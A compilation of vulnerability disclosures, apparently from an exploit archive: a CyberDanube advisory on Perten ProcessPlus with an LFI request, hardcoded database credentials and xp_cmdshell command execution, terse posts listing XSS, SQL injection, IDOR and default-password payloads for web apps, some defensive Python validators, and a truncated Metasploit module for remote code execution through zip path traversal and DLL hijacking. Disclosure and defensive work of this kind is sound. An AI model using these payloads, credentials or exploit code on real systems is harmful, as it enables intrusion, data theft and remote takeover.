<pre><code>CyberDanube Security Research 20240722-0<br />-------------------------------------------------------------------------------<br /> title| Multiple Vulnerabilities<br /> product| Perten Instruments Process Plus Software<br /> vulnerable version| <=1.11.6507.0<br /> fixed version| 2.0.0<br /> CVE number| CVE-2024-6911, CVE-2024-6912, CVE-2024-6913<br /> impact| High<br /> homepage| https://perkinelmer.com<br /> found| 2024-04-24<br /> by| S. Dietz, T. Weber (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"For 85 years, PerkinElmer has pushed the boundaries of science from food to<br />health to the environment. We’ve always pursued science with a clear purpose –<br />to help our customers achieve theirs. Our expert team brings technology and<br />intangibles, like creativity, empathy, diligence, and a spirit of<br />collaboration, in equal measure, to fulfill our customers’ desire to work<br />better, innovate better, and create better.<br /><br />PerkinElmer is a leading, global provider of technology and service solutions<br />that help customers measure, quantify, detect, and report in ways that help<br />ensure the quality, safety, and satisfaction of their products."<br /><br />Source: https://www.perkinelmer.com/<br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />ProcessPlus Software / <=1.11.6507.0<br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Unauthenticated Local File Inclusion (CVE-2024-6911)<br />An LFI was identified in the web interface of the device. An attacker can use<br />this vulnerability to read system-wide files and configuration.<br /><br />2) Hardcoded MSSQL Credentials (CVE-2024-6912)<br />The software is using the same MSSQL credentials across multiple installations.<br />In combination with 3), this allows an attacker to fully compromise the host.<br /><br />3) Execution with Unnecessary Privileges (CVE-2024-6913)<br />The software uses the user "sa" to connect to the database. Access to this<br />account allows an attacker to execute commands via the "xp_cmdshell" procedure.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Unauthenticated Local File Inclusion (CVE-2024-6911)<br />The LFI can be triggered by using the following GET Request:<br />-------------------------------------------------------------------------------<br />GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1<br />Host: 192.168.0.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />-------------------------------------------------------------------------------<br />This example returns the content from "C:\Windows\System32\drivers\etc\hosts"<br />of an affected installation.<br /><br />2) Hardcoded MSSQL Credentials (CVE-2024-6912)<br />Analysis across multiple installations shows that the configuration file<br />"\ProgramData\Perten\ProcessPlus\OPCDA_SERVER.xml" contains credentials:<br />-------------------------------------------------------------------------------<br />[...]<br /><OPCDA_Server dbconnectstring="Driver={SQL Server};SERVER=.\PertenSQL;<br />DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno" application_id="1"<br />appid="Perten.OPCDA.Server" loglevel="info"<br />logfile="C:\Perten\ProcessPlus\Log\opcserver.log"><br />[...]<br />-------------------------------------------------------------------------------<br />These credentials "sa:enilno" were re-used in all reviewed installations.<br /><br />3) Execution with Unnecessary Privileges (CVE-2024-6913)<br />The application uses the "sa" user to authenticate with the database. By using<br />Metasploit an attacker can execute arbitrary commands:<br />-------------------------------------------------------------------------------<br />msf6 auxiliary(admin/mssql/mssql_exec) > show options<br /><br />Module options (auxiliary/admin/mssql/mssql_exec):<br /><br /> Name Current Setting<br /> ---- ---------------<br /> CMD dir<br /> PASSWORD enilno<br /> RHOSTS 192.168.0.1<br /> RPORT 1433<br /> TDSENCRYPTION false<br /> TECHNIQUE xp_cmdshell<br /> USERNAME sa<br /> USE_WINDOWS_AUTHENT false<br /><br />msf6 auxiliary(admin/mssql/mssql_exec) > run<br />[*] Running module against 192.168.0.1<br /><br />[*] 192.168.0.1:1433 - SQL Query: EXEC master..xp_cmdshell 'dir'<br /><br />[...]<br /> Directory of C:\Windows\system32<br /> 01/23/2024 13:37 AM <DIR> .<br /> 01/23/2024 13:37 AM <DIR> ..<br /> 01/23/2024 13:37 AM <DIR> 0123<br /> 01/23/2024 13:37 AM <DIR> 0123<br /> 01/23/2024 13:37 AM 232 @AppHelpToast.png<br /> 01/23/2024 13:37 AM 308 @AudioToastIcon.png<br />[...]<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Update to version 2.0.0.<br /><br />Workaround<br />-------------------------------------------------------------------------------<br />Restrict network access to the host with the installed software. Change the<br />default credentials of the database in the config file and the database itself.<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends that Perten customers upgrade the software to the latest<br />version available and restrict network access to the management interface.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2024-04-29: Contacted PerkinElmer via dpo@perkinelmer.com.<br />2024-05-13: Vendor asked for unencrypted advisory.<br />2024-05-16: Sent advisory to vendor.<br />2024-05-22: Asked for status update. No answer.<br />2024-05-28: Asked for status update. Contact stated that they are working on a<br /> fix.<br />2024-06-10: Asked for status update. Contact stated that all issues should be<br /> fixed by end of month. Local file inclusion should be fixed in<br /> version 1.16. Asked for a release date of version 1.16. No answer.<br />2024-07-13: Asked for status update.<br />2024-07-15: Contact stated that all three issues have been fixed in version<br /> 2.0.0, which was released on 2024-07-11.<br />2024-07-16: Asked for a link to the firmware update release.<br />2024-07-17: Set release date to 2024-07-22.<br />2024-07-22: Coordinated release of security advisory.<br /><br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF S. Dietz, T. Weber / @2024<br /><br /></code></pre>
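The LFI above comes down to a `filename` parameter that is joined to a log directory without validation. The following is an added example (not Perten/PerkinElmer code) of an allow-list validator for such a parameter, plus a detector that applies the same rule to web-server log lines; `LOG_DIR`, the function names and the simplified log layout are assumptions, and the log lines are constructed.

```python
"""
Hardened handling of a log-download file name such as the `filename`
parameter of /ProcessPlus/Log/Download/, plus a detector that runs the
same rule over request log lines. Added example, not vendor code.
"""
import ntpath
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote

# Assumed log directory; the advisory's OPCDA_SERVER.xml points its own
# logfile at C:\Perten\ProcessPlus\Log, so that path is used here.
LOG_DIR = r"C:\Perten\ProcessPlus\Log"

# Allow-list: a bare file name of letters, digits, '_' and '-', ending in
# .log. No separators, no drive letters, no dot segments.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_\-]+\.log$")


def safe_log_name(user_value: str) -> Optional[str]:
    """Return the validated bare file name, or None if it must be rejected."""
    # Decode once more in case the value is still percent-encoded
    # (e.g. %2e%2e%5c); decoding cannot turn a rejected value into an
    # accepted one because the decoded result is what gets checked.
    name = unquote(user_value)
    if "\x00" in name:
        return None
    # Reject both separators and the colon of drive/stream syntax outright,
    # so ..\..\..\Windows\System32\drivers\etc\hosts fails right here.
    if any(ch in name for ch in ("/", "\\", ":")):
        return None
    if not _SAFE_NAME.match(name):
        return None
    return name


def resolve_log_path(user_value: str, base_dir: str = LOG_DIR) -> Optional[str]:
    """Map the request parameter to an absolute path inside base_dir, or None."""
    name = safe_log_name(user_value)
    if name is None:
        return None
    base = ntpath.normpath(base_dir)
    # ntpath so the containment check behaves like Windows on any host.
    full = ntpath.normpath(ntpath.join(base, name))
    # Defence in depth: the allow-list already excludes traversal, but
    # confirm the resolved path still lies under base_dir.
    if ntpath.commonpath([full, base]) != base:
        return None
    return full


# Constructed log lines (not from the advisory) in a simplified
# "date time method uri-stem uri-query status" layout.
SAMPLE_LOG = """\
2024-04-24 10:00:01 GET /ProcessPlus/Log/Download/ filename=_Errors_2102162.log&filenameWithSerialNumber=_Errors_2102162.log 200
2024-04-24 10:00:07 GET /ProcessPlus/Log/Download/ filename=..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&filenameWithSerialNumber=_Errors_2102162.log 200
2024-04-24 10:00:09 GET /ProcessPlus/Log/Download/ filename=%2e%2e%5c%2e%2e%5cWindows%5cwin.ini&filenameWithSerialNumber=x.log 200
2024-04-24 10:00:12 GET /ProcessPlus/Home/ - 200
"""

_CHECKED_PARAMS = ("filename", "filenameWithSerialNumber")


def find_traversal_attempts(log_text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, parameter, decoded value) for every download
    request whose file-name parameter the validator would reject."""
    hits: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        parts = line.split()
        if len(parts) < 6 or not parts[3].lower().startswith("/processplus/log/download"):
            continue
        query = parse_qs(parts[4], keep_blank_values=True)
        for param in _CHECKED_PARAMS:
            for value in query.get(param, []):
                if safe_log_name(value) is None:
                    hits.append((lineno, param, value))
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print("traversal attempt:", hit)
```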
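To find installations still affected by the shared "sa" credentials before the 2.0.0 update is rolled out, the connection string in OPCDA_SERVER.xml can be audited directly. This is an added example, not Perten/PerkinElmer code; both XML documents below are constructed samples shaped like the advisory's excerpt.

```python
"""
Audit of the dbconnectstring attribute in OPCDA_SERVER.xml: flags the "sa"
login (CVE-2024-6913) and the published shared password (CVE-2024-6912).
Added example, not vendor code.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample shaped like the advisory's OPCDA_SERVER.xml excerpt.
SAMPLE_XML = (
    '<OPCDA_Server dbconnectstring="Driver={SQL Server};SERVER=.\\PertenSQL;'
    'DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno" application_id="1" '
    'appid="Perten.OPCDA.Server" loglevel="info" '
    'logfile="C:\\Perten\\ProcessPlus\\Log\\opcserver.log"/>'
)

# Constructed: the file after the workaround (dedicated low-privilege login,
# site-specific password; the password value here is a placeholder).
REMEDIATED_XML = (
    '<OPCDA_Server dbconnectstring="Driver={SQL Server};SERVER=.\\PertenSQL;'
    'DATABASE=ProcessPlus_OPC;UID=processplus_opc;PWD=PLACEHOLDER_SITE_SECRET" '
    'application_id="1" appid="Perten.OPCDA.Server" loglevel="info"/>'
)

# The password the advisory reports as shared across all reviewed installations.
PUBLISHED_DEFAULT_PASSWORD = "enilno"


def parse_connection_string(conn: str) -> Dict[str, str]:
    """Parse an ODBC-style 'Key=Value;Key=Value' string into upper-cased keys.
    Only the first '=' of each part separates key from value, so a value
    such as {SQL Server} or one containing '=' survives intact."""
    out: Dict[str, str] = {}
    for part in conn.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            out[key.strip().upper()] = value.strip()
    return out


def audit_opcda_config(xml_text: str) -> List[str]:
    """Return findings for every OPCDA_Server element in the document."""
    root = ET.fromstring(xml_text)
    nodes = [root] if root.tag == "OPCDA_Server" else root.findall(".//OPCDA_Server")
    findings: List[str] = []
    for node in nodes:
        kv = parse_connection_string(node.get("dbconnectstring", ""))
        if kv.get("UID", "").lower() == "sa":
            findings.append("CVE-2024-6913: connects as the sysadmin login 'sa'")
        if kv.get("PWD") == PUBLISHED_DEFAULT_PASSWORD:
            findings.append("CVE-2024-6912: password is the published shared default")
    return findings


if __name__ == "__main__":
    for finding in audit_opcda_config(SAMPLE_XML):
        print(finding)
```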
<pre><code>====================================================================================================================================<br />| # Title : LMS ZAI v6.1 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://codecanyon.net/item/lmszai-learning-management-system/38383087 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Insecure Settings : the application appears to leave a default administrative account in place after installation.<br /><br />[+] use payload : user = admin@gmail.com & pass = 123456<br /><br />[+] https://www/127.0.0.1/www.mylmsin/admin/dashboard<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Quick Job v2.4 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://bylancer.com/demo/quickjob/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Insecure Direct Object Reference : the application suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload : //admin/header.php<br /><br />[+] https://www/127.0.0.1/newjobcartcom/admin/header.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : PPDB ONLINE V.1.3 HTML Form in redirect page Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://berkas.siap-ppdb.com/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Vulnerability description :<br /><br /><br />An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.<br /> Therefore, browser users will not see the contents of this page and will not be able to interact with the HTML form. <br /><br />Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example: <br /><?php<br /> if (!isset($_SESSION["authenticated"])) {<br /> header("Location: auth.php");<br /> }<br />?><br /><title>Administration page</title><br /><form action="/admin/action" method="post"><br /> <!-- ... form inputs ... --><br /></form><br /> <br /><!-- ... the rest of the administration page ... --><br />This script is incorrect because execution does not stop after the "header("Location: auth.php");" line. An attacker can access the content of the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability. <br />The correct code would be: <br /><br /><?php<br /> if (!isset($_SESSION["authenticated"])) {<br /> header("Location: auth.php");<br /> exit();<br /> }<br />?><br /><title>Administration page</title><br /><form action="/admin/action" method="post"><br /> <!-- ... form inputs ... --><br /></form><br /> <br /><!-- ... the rest of the administration page ... --><br /><br />[+] affected item : /pass. <br /><br />[+] Attack details :<br /><br />Form action=''<br /><br />GET /pass/ HTTP/1.1<br />Pragma: no-cache<br />Cache-Control: no-cache<br />Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass<br />Acunetix-Aspect: enabled<br />Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c<br />Acunetix-Aspect-Queries: filelist;aspectalerts<br />Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f<br />Host: elearning7.smpn49-jkt.sch.id<br />Connection: Keep-alive<br />Accept-Encoding: gzip,deflate<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21<br />Accept: */*<br /><br />Response<br />HTTP/1.1 302 Found<br />Connection: Keep-Alive<br />Keep-Alive: timeout=5, max=100<br />x-powered-by: PHP/7.3.33<br />location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php<br />content-type: text/html; charset=UTF-8<br />content-length: 16992<br />vary: Accept-Encoding,User-Agent<br />date: Fri, 19 Jul 2024 10:09:49 GMT<br />server: LiteSpeed<br />cache-control: no-cache, no-store, must-revalidate, max-age=0<br />platform: hostinger<br />strict-transport-security: max-age=31536000; includeSubDomains; preload<br />x-xss-protection: 1; mode=block<br />x-content-type-options: nosniff<br />Original-Content-Encoding: gzip<br /><br />[+] The impact of this vulnerability : depends on the affected web application.<br /><br />[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page.<br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
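The tell-tale sign of the missing exit() described above is a 3xx response that still carries a full page body (the captured 302 declares 16992 bytes). The following is an added example (not the advisory author's or vendor's code) of a regression check that a developer can run against raw responses from their own staging server; the three responses are constructed, and the function names and the 1024-byte threshold are assumptions.

```python
"""
Audit a raw HTTP response for the "HTML form in redirect page" condition:
a redirect whose body still contains the protected page. Added example.
"""
import re
from typing import Dict, Optional, Tuple

# Constructed: a 302 whose body still carries the admin page.
LEAKY_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "location: https://127.0.0.1/example/login.php\r\n"
    "content-type: text/html; charset=UTF-8\r\n"
    "content-length: 16992\r\n"
    "\r\n"
    "<title>Administration page</title>\n"
    '<form action="/admin/action" method="post"><input name="user"></form>\n'
)

# Constructed: headers only, as kept by a scanner that discarded the body.
HEADERS_ONLY_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "location: https://127.0.0.1/example/login.php\r\n"
    "content-type: text/html; charset=UTF-8\r\n"
    "content-length: 16992\r\n"
    "\r\n"
)

# Constructed: the same redirect after exit() was added; nothing follows the headers.
CLEAN_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "location: https://127.0.0.1/example/login.php\r\n"
    "content-type: text/html; charset=UTF-8\r\n"
    "content-length: 0\r\n"
    "\r\n"
)

# Interactive markup has no business in a redirect body.
_INTERACTIVE_RE = re.compile(r"<(form|input|textarea|select|button)\b", re.IGNORECASE)
# Anything beyond a tiny "Moved" stub is suspicious on a 3xx (assumed threshold).
MAX_REDIRECT_BODY = 1024


def parse_response(raw: str) -> Tuple[int, Dict[str, str], str]:
    """Split a raw HTTP/1.x response into (status, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def audit_redirect(raw: str) -> Optional[str]:
    """Return a finding for a redirect that still exposes content, else None."""
    status, headers, body = parse_response(raw)
    if not (300 <= status < 400) or "location" not in headers:
        return None  # not a redirect; this check does not apply
    # A browser never renders this body, but any client that does not
    # follow the Location header receives it in full.
    if _INTERACTIVE_RE.search(body):
        return "redirect body still contains form/input markup"
    declared = int(headers.get("content-length", "0") or 0)
    size = max(declared, len(body))
    if size > MAX_REDIRECT_BODY:
        return f"redirect carries {size} body bytes; expected an empty stub"
    return None


if __name__ == "__main__":
    for name, raw in (("leaky", LEAKY_RESPONSE), ("headers-only", HEADERS_ONLY_RESPONSE),
                      ("clean", CLEAN_RESPONSE)):
        print(name, "->", audit_redirect(raw))
```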
<pre><code>====================================================================================================================================<br />| # Title : PHP MaXiMuS v2.5.2 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://php-maximus.fr/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload : /modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt><br /><br />[+] https://www/127.0.0.1/zmasterfr/modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt><br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : NUKE SENTINEL v2.5.2 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://www.ravenphpscripts.com/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload : /modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt><br /><br />[+] https://www/127.0.0.1/zmasterfr/modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt><br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Minfotech CMS v2.0 Sql injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://minfotech.in/AboutUs |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload : /project_list?name=stretch_films <===== inject here<br /><br />[+] https://www/127.0.0.1/shivexportnavsaricom/project_list?name=stretch_films<br /><br />[+] Login : /admin/<br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : eDesign CMS v2.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://gico.io/agop/demos/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Insecure Direct Object Reference : the application suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload : /admin/register<br /><br />[+] https://www/127.0.0.1/yenpresscom/admin/register<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'zip'<br />require 'metasploit/framework/login_scanner/softing_sis'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Softing Secure Integration Server v1.22 Remote Code Execution',<br /> 'Description' => %q{<br /> This module chains two vulnerabilities (CVE-2022-1373 and CVE-2022-2334) to achieve authenticated remote code execution against Softing Secure Integration Server v1.22.<br /><br /> In CVE-2022-1373, the restore configuration feature is vulnerable to a directory traversal vulnerability when processing zip files. The "restore configuration" feature is used to upload a zip file containing a path traversal entry, a DLL named ..\..\..\..\..\..\..\..\..\..\..\Windows\System32\wbem\wbemcomn.dll. This causes the file C:\Windows\System32\wbem\wbemcomn.dll to be created and executed upon touching the disk.<br /><br /> In CVE-2022-2334, the planted wbemcomn.dll is used in a DLL hijacking attack when Softing Secure Integration Server restarts upon restoring configuration, which allows us to execute arbitrary code on the target system.<br /><br /> The chain demonstrated in Pwn2Own used a signature instead of a password. The signature was acquired by running an ARP spoofing attack against the local network where the Softing SIS server was located. A username is also required for signature authentication.<br /><br /> A custom DLL can be provided to use in the exploit instead of using the default MSF-generated one. Refer to the module documentation for more details.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Chris Anastasio (muffin) of Incite Team', # discovery<br /> 'Steven Seeley (mr_me) of Incite Team', # discovery<br /> 'Imran E. Dawoodjee <imrandawoodjee.infosec[at]gmail.com>', # msf module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-1373'],<br /> ['CVE', '2022-2334'],<br /> ['ZDI', '22-1154'],<br /> ['ZDI', '22-1156'],<br /> ['URL', 'https://industrial.softing.com/fileadmin/psirt/downloads/syt-2022-5.html'],<br /> ['URL', 'https://ide0x90.github.io/softing-sis-122-rce/']<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8099,<br /> 'SSL' => false,<br /> 'EXITFUNC' => 'thread',<br /> 'WfsDelay' => 300<br /> },<br /> 'Platform' => 'win',<br /> # the software itself only supports x64, see<br /> # https://industrial.softing.com/products/opc-opc-ua-software-platform/integration-platform/secure-integration-server.html<br /> 'Arch' => [ARCH_X64],<br /> 'Targets' => [<br /> [ 'Windows x64', { 'Arch' => ARCH_X64 } ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2022-07-27',<br /> 'Privileged' => true,<br /> 'Compat' => {<br /> 'Meterpreter' => {<br /> 'Commands' => %w[<br /> stdapi_fs_delete_file<br /> ]<br /> }<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('SIGNATURE', [false, 'Use a username/signature pair instead of username/password pair to authenticate']),<br /> OptString.new('USERNAME', [false, 'The username to specify for authentication.', 'admin']),<br /> OptString.new('PASSWORD', [false, 'The password to specify for authentication', 'admin']),<br /> OptString.new('DLLPATH', [false, 'Custom compiled DLL to use'])<br /> ]<br /> )<br /><br /> self.needs_cleanup = true<br /> end<br /><br /> # this will be updated with the signature from "check"<br /> @signature = nil<br /><br /> # create a checker instance to reuse code from the Softing SIS login bruteforce module<br /> def checker_instance<br /> Metasploit::Framework::LoginScanner::SoftingSIS.new(<br /> configure_http_login_scanner(<br /> host: datastore['RHOSTS'],<br /> port: datastore['RPORT'],<br /> connection_timeout: 5<br /> )<br /> ).dup<br /> end<br /><br /> # check if the generated/provided signature is valid for the specified user<br /> def signature_check(user, signature)<br /> send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => "/runtime/core/user/#{user}/authentication",<br /> 'vars_get' => {<br /> 'User' => user,<br /> 'Signature' => signature<br /> }<br /> })<br /> end<br /><br /> def check<br /> # check the Softing SIS version<br /> softing_version_res = checker_instance.check_setup<br /> unless softing_version_res<br /> return CheckCode::Unknown<br /> end<br /><br /> softing_version = Rex::Version.new(softing_version_res)<br /> print_status("#{peer} - Found Softing Secure Integration Server #{softing_version}")<br /><br /> # the vulnerabilities are to be fixed in version 1.30 according to the Softing advisory<br /> # so we will not continue if the version is not vulnerable<br /> unless softing_version < Rex::Version.new('1.30')<br /> return CheckCode::Safe<br /> end<br /><br /> # if the operator provides a signature, then use that instead of the username and password<br /> if datastore['SIGNATURE']<br /> print_status("#{peer} - Authenticating as user #{datastore['USERNAME']} with signature #{datastore['SIGNATURE']}...")<br /> # send a GET request to /runtime/core/user/<username>/authentication<br /> signature_check_res = signature_check(datastore['USERNAME'], datastore['SIGNATURE'])<br /><br /> # if we cannot connect at this point, we only know that the version is < 1.30<br /> # the system "appears" to be vulnerable, and there is no response to inspect<br /> unless signature_check_res<br /> print_error("#{peer} - Connection failed!")<br /> return CheckCode::Appears<br /> end<br /><br /> # if the signature is correct, 200 OK is returned<br /> if signature_check_res.code == 200<br /> print_good("#{peer} - Signature #{datastore['SIGNATURE']} is valid for user #{datastore['USERNAME']}")<br /> @signature = datastore['SIGNATURE']<br /> else<br /> print_error("#{peer} - Signature #{datastore['SIGNATURE']} is invalid for user #{datastore['USERNAME']}!")<br /> end<br /> # login with username and password<br /> else<br /> # get the authentication token<br /> auth_token = checker_instance.get_auth_token(datastore['USERNAME'])<br /> # generate the signature<br /> @signature = checker_instance.generate_signature(auth_token[:proof], datastore['USERNAME'], datastore['PASSWORD'])<br /> # check the generated signature's validity<br /> signature_check_res = signature_check(datastore['USERNAME'], @signature)<br /> # if we cannot connect, then the system "appears" to be vulnerable<br /> # and there is no response to inspect<br /> unless signature_check_res<br /> print_error("#{peer} - Connection failed!")<br /> return CheckCode::Appears<br /> end<br /><br /> # if the signature is correct, 200 OK is returned<br /> if signature_check_res.code == 200<br /> print_good("#{peer} - Valid credentials provided")<br /> else<br /> print_error("#{peer} - Invalid credentials!")<br /> end<br /> end<br /><br /> # if the version is less than 1.30 it's supposedly vulnerable<br /> # but there is no way to confirm vulnerability existence without actually exploiting<br /> # so instead of "Vulnerable", return "Appears"<br /> CheckCode::Appears<br /> end<br /><br /> def exploit<br /> # did the operator specify a custom DLL?<br /> if datastore['DLLPATH']<br /> # if so, just use their provided DLL and assume they compiled everything correctly<br /> # there is no way to check if it's compiled correctly anyway<br /> dll_path = datastore['DLLPATH']<br /> else<br /> # otherwise, have MSF create the malicious DLL<br /> path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-2334')<br /> datastore['EXE::Path'] = path<br /> datastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll')<br /><br /> print_status('Generating payload DLL...')<br /> dll = generate_payload_dll<br /> dll_name = 'wbemcomn.dll'<br /> dll_path = store_file(dll, dll_name)<br /> print_status("Created #{dll_path}")<br /> end<br /><br /> # backup the Softing SIS configuration<br /> print_status("#{peer} - Saving configuration...")<br /> get_config_zip_res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => '/runtime/core/config-download',<br /> 'vars_get' => {<br /> 'User' => datastore['USERNAME'],<br /> 'Signature' => @signature<br /> }<br /> })<br /><br /> # end if we cannot get the configuration for some reason<br /> unless get_config_zip_res<br /> fail_with Failure::Unreachable, "#{peer} - Could not obtain configuration"<br /> end<br /><br /> # status code 200 is the expected response to getting the configuration ZIP<br /> unless get_config_zip_res.code == 200<br /> # for verbosity, save the JSON response<br /> get_config_zip_res_json = get_config_zip_res.get_json_document<br /> vprint_error("#{peer} - #{get_config_zip_res_json}")<br /> fail_with Failure::UnexpectedReply, "#{peer} - Returned code #{get_config_zip_res.code}, could not obtain configuration"<br /> end<br /><br /> # if successful, the body contains the configuration ZIP<br /> config_zip = get_config_zip_res.body<br /><br /> # config_download.zip is the name of the configuration ZIP when downloading from the browser<br /> # append a hash based on the peer address to prevent overwriting the config file if there are multiple targets<br /> config_zip_name = "config_download_#{Digest::MD5.hexdigest(peer)}.zip"<br /><br /> # store the config zip file<br /> config_zip_path = store_file(config_zip, config_zip_name)<br /> print_status("Saved configuration to 